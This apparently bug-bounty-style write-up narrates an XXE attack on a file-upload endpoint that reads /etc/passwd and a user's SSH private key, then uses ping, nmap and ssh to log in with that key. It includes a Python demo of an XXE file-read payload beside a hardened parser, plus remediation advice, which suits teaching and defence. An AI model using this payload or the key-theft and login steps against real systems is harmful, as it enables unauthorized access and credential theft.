Today, I'm thrilled to share my discovery of a critical vulnerability in a web application that ultimately led to an unauthorized SSH session on the host. While conducting a routine assessment with Burp Suite, I came across file upload endpoints. To gauge how strict the upload handling was, I tried various file types and was surprised to find that the application accepted, and parsed, XML files.
Understanding the potential risks associated with XML uploads, I set out to exploit this newfound capability. Crafting a specially designed XML payload, I aimed to leverage an XML External Entity (XXE) injection.
The payload I used resembled the following:
This payload asked the parser to fetch /etc/passwd from the server's filesystem and splice it into the document, and the contents came back in the response: an arbitrary file read through XXE (often loosely labelled Local File Inclusion, although nothing is executed, only read). With it I could read any file the application's own user account could read, which limited what was reachable.
Eager to escalate further, I tried /etc/shadow, hoping to pull password hashes. The application was not running as root, so that read failed. My exploration did, however, turn up a user account, call it 'Alice', whose home directory the application's user was permitted to read.
Capitalizing on this, I went after Alice's SSH private key, which could grant direct access to the host. With the same payload structure and only the SYSTEM identifier changed, I targeted the key file at /home/users/alice/.ssh/id_rsa.
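The payload itself is not reproduced on the page, so the following is an added example, not the author's payload or any code from the target application. It shows the shape of an XXE file-read payload against a constructed stand-in for /etc/passwd, a parser wired to resolve SYSTEM entities from disk the way the vulnerable upload handler must have, and the hardened counterpart that refuses any entity declaration. It uses Python's standard-library expat binding; the element names, the entity name `xxe`, and the temporary file path are assumptions made for the demo.

```python
import os
import tempfile
import xml.parsers.expat as expat

# Constructed stand-in for /etc/passwd so the demo runs offline and never
# touches real system files (assumption: the real target leaked the real file).
FAKE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "alice:x:1000:1000::/home/alice:/bin/bash\n"
)

# Classic XXE shape: the DOCTYPE declares an external general entity whose
# SYSTEM identifier names a local file, and element content references it,
# so a resolving parser splices the file in as ordinary text.
PAYLOAD_TEMPLATE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE upload [\n'
    '  <!ENTITY xxe SYSTEM "file://{path}">\n'
    ']>\n'
    '<upload><owner>&xxe;</owner></upload>'
)


def make_payload(path):
    """Build the payload for an absolute file path (hypothetical element names)."""
    return PAYLOAD_TEMPLATE.format(path=path)


def write_fake_passwd():
    """Write the constructed passwd file to a temp location and return its path."""
    fd, path = tempfile.mkstemp(prefix="xxe-demo-")
    with os.fdopen(fd, "w") as f:
        f.write(FAKE_PASSWD)
    return path


def parse_vulnerable(xml_text):
    """Parser that honours SYSTEM identifiers: the misconfiguration the writeup exploited.

    Returns all character data the parse produced, which includes the entity body.
    """
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    def resolve_external(context, base, system_id, public_id):
        # Open whatever the attacker named (file:// URL assumed) and feed it to a
        # child parser; the child inherits our handlers, so the file body lands in chunks.
        path = system_id[len("file://"):] if system_id.startswith("file://") else system_id
        with open(path, "rb") as f:
            body = f.read()
        parser.ExternalEntityParserCreate(context).Parse(body, True)
        return 1  # tell expat the reference was resolved

    parser.ExternalEntityRefHandler = resolve_external
    parser.Parse(xml_text, True)
    return "".join(chunks)


def parse_hardened(xml_text):
    """Same parser with DTD entity handling disabled.

    Any entity declaration aborts the parse (the approach defusedxml takes), and an
    external reference is refused should one ever get that far.
    """
    parser = expat.ParserCreate()
    chunks = []
    parser.CharacterDataHandler = chunks.append

    def reject_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        raise ValueError(f"entity declaration not allowed: {name!r}")

    parser.EntityDeclHandler = reject_entity_decl
    parser.ExternalEntityRefHandler = lambda *args: 0  # 0 = unresolved, expat errors out
    parser.Parse(xml_text, True)
    return "".join(chunks)


def demo():
    """Run the payload through both parsers; returns what leaked and what was blocked."""
    path = write_fake_passwd()
    try:
        payload = make_payload(path)
        leaked = parse_vulnerable(payload)
        try:
            parse_hardened(payload)
            blocked = None
        except (ValueError, expat.ExpatError) as exc:
            blocked = str(exc)
    finally:
        os.unlink(path)
    return {"leaked": leaked, "blocked": blocked}


if __name__ == "__main__":
    result = demo()
    print("vulnerable parser returned:\n" + result["leaked"])
    print("hardened parser:", result["blocked"])
```

Run it and the vulnerable parser echoes the fake passwd file back as element text, exactly the behaviour the upload endpoint showed, while the hardened one aborts at the DOCTYPE before any reference is resolved. The equivalent settings elsewhere: defusedxml in Python, `resolve_entities=False` together with `no_network=True` on lxml's `XMLParser`, and the `disallow-doctype-decl` feature on a Java `DocumentBuilderFactory`.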
To my delight, the payload successfully retrieved Alice’s SSH private key. With this crucial piece of information in hand, I proceeded to identify the IP address of the target server using a simple ping command:
ping target.com
Subsequently, I ran an Nmap scan to confirm that port 22, the SSH port, was open:
nmap -p 22 -sV IP_ADDRESS
The scan confirmed that port 22 was open, paving the way for me to log in as Alice with the retrieved key (ssh refuses a key file that is readable by others, so it must be restricted to the owner first):
chmod 600 id_rsa
ssh -i id_rsa alice@IP_ADDRESS
This access granted me significant leverage within the system, underscoring the severity of the initial XXE vulnerability.
In conclusion, an XXE vulnerability in a file upload feature went from a file read to a shell on the host in a few steps. The fixes are well known: disable DTD processing and external entity resolution in the XML parser, accept only the file types the feature actually needs, run the application under an account that cannot read other users' home directories, and keep private keys readable by their owner alone. Regular security audits catch the cases where one of these is missed. Proactive measures like these are essential to safeguarding sensitive data and maintaining the integrity of web applications in today's ever-evolving threat landscape. Stay vigilant, stay secure.